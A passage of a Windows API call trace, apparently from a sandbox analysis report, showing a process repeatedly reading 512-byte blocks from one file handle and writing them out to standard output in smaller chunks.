0x50 [0195.009] GetFileType (hFile=0x50) returned 0x1 [0195.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.009] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.010] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.010] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.010] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.010] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] GetFileType (hFile=0x50) returned 0x1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] GetFileType (hFile=0x50) returned 0x1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] GetFileType (hFile=0x50) returned 0x1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] GetFileType (hFile=0x50) returned 0x1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] GetFileType (hFile=0x50) returned 0x1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] GetFileType (hFile=0x50) returned 0x1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] GetFileType (hFile=0x50) returned 0x1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] GetFileType (hFile=0x50) returned 0x1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.011] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.011] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.011] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.011] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] GetFileType (hFile=0x50) returned 0x1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] GetFileType (hFile=0x50) returned 0x1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] GetFileType (hFile=0x50) returned 0x1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] GetFileType (hFile=0x50) returned 0x1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] GetFileType (hFile=0x50) returned 0x1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] GetFileType (hFile=0x50) returned 0x1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] GetFileType (hFile=0x50) returned 0x1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] GetFileType (hFile=0x50) returned 0x1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.012] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.012] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.012] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.012] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] GetFileType (hFile=0x50) returned 0x1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] GetFileType (hFile=0x50) returned 0x1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] GetFileType (hFile=0x50) returned 0x1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] GetFileType (hFile=0x50) returned 0x1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] GetFileType (hFile=0x50) returned 0x1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] GetFileType (hFile=0x50) returned 0x1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] GetFileType (hFile=0x50) returned 0x1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] GetFileType (hFile=0x50) returned 0x1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.013] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.013] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.013] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.013] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] GetFileType (hFile=0x50) returned 0x1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] GetFileType (hFile=0x50) returned 0x1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] GetFileType (hFile=0x50) returned 0x1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] GetFileType (hFile=0x50) returned 0x1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] GetFileType (hFile=0x50) returned 0x1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.014] GetFileType (hFile=0x50) returned 0x1 [0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.014] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.014] GetFileType (hFile=0x50) returned 0x1 [0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.014] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.014] GetFileType (hFile=0x50) returned 0x1 [0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.014] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.014] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.014] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.014] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.014] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.014] GetFileType (hFile=0x50) returned 0x1 [0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.014] GetFileType (hFile=0x50) returned 0x1 [0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.014] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.014] GetFileType (hFile=0x50) returned 0x1 [0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.014] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.014] GetFileType (hFile=0x50) returned 0x1 [0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.014] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.015] GetFileType (hFile=0x50) returned 0x1 [0195.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.015] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.015] GetFileType (hFile=0x50) returned 0x1 [0195.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.015] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.015] GetFileType (hFile=0x50) returned 0x1 [0195.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.015] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.015] GetFileType (hFile=0x50) returned 0x1 [0195.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.015] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.015] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.015] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.015] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.015] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.015] GetFileType (hFile=0x50) returned 0x1 [0195.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.015] GetFileType (hFile=0x50) returned 0x1 [0195.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.015] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.015] GetFileType (hFile=0x50) returned 0x1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] GetFileType (hFile=0x50) returned 0x1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] GetFileType (hFile=0x50) returned 0x1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] GetFileType (hFile=0x50) returned 0x1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] GetFileType (hFile=0x50) returned 0x1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] GetFileType (hFile=0x50) returned 0x1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.016] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.016] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.016] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.016] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] GetFileType (hFile=0x50) returned 0x1 [0195.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.016] GetFileType (hFile=0x50) returned 0x1 [0195.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] GetFileType (hFile=0x50) returned 0x1 [0195.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] GetFileType (hFile=0x50) returned 0x1 [0195.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] GetFileType (hFile=0x50) returned 0x1 [0195.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] GetFileType (hFile=0x50) returned 0x1 [0195.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] GetFileType (hFile=0x50) returned 0x1 [0195.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] GetFileType (hFile=0x50) returned 0x1 [0195.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.017] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.017] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.017] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.017] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.017] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] GetFileType (hFile=0x50) returned 0x1 [0195.018] _get_osfhandle (_FileHandle=1) returned 